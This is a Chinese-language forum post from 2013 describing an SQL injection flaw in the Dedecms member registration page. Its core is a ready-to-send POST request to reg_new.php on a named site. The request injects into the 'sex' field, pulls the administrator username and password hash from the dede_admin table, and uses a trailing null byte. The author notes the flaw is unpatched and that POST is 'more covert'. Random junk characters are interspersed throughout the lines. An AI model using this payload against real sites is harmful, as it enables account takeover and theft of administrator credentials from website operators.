漏洞类型: SQL注射漏洞
- t$ o! \+ Z8 A4 O/ m简要描述:
. ^5 f: t9 A! K2 r" @! Y( N
$ \! [6 X( n! s. Y6 f9 T需要magic_quotes_gpc=Off,应该是没有什么大危害的漏洞.' @, P" S7 ]; b: E
原来在wooyun发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.
% E: [ V9 b& G详细说明:跟这个漏洞" P- c. @- `5 }4 U7 e" ^0 j$ R
8 \0 m6 C; s4 B3 a8 `6 i( F& c" wWooYun: Dedecms SQL注射导致审核机制绕过漏洞
3 T& H& r- Z+ i9 v" T- O$ q2 L是一个漏洞.其实不仅仅是审核机制绕过,可以获得管理员密码的.
- q' I' O) \2 W$ j* l7 h% rPOST提交以下数据,其实不用POST提交的,这样隐蔽点.1 o0 B! @% z3 Q, k4 F
/ L4 k1 K! r1 }# N* Vwww.political-security.com/member/reg_new.php/ {- ]3 k! u' L9 g% S
( B" T' \1 R. }4 w! s
POST1 u* D! O8 N2 P- E
2 d5 U+ o, Q3 W
dopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&
5 y+ F% C* e3 n' d/ _0 zuserid=c4rp3nt3r&uname=c4rp3nt3r1 X Q3 p8 ?% A/ O
&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss* U2 h9 `( ^* q6 g$ o/ v8 L
&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,1 G5 [$ W4 K& u3 `. K ~) v
(select concat(userid,0x3a,pwd) from `dede_admin` limit 1),0,'',1316751900,'',1316751900,'');
( T, N9 u* d3 h$ H# d. |6 |1 C%00&vdcode=glos&agree= |
发表于 2013-1-19 08:25:02
收藏
支持
反对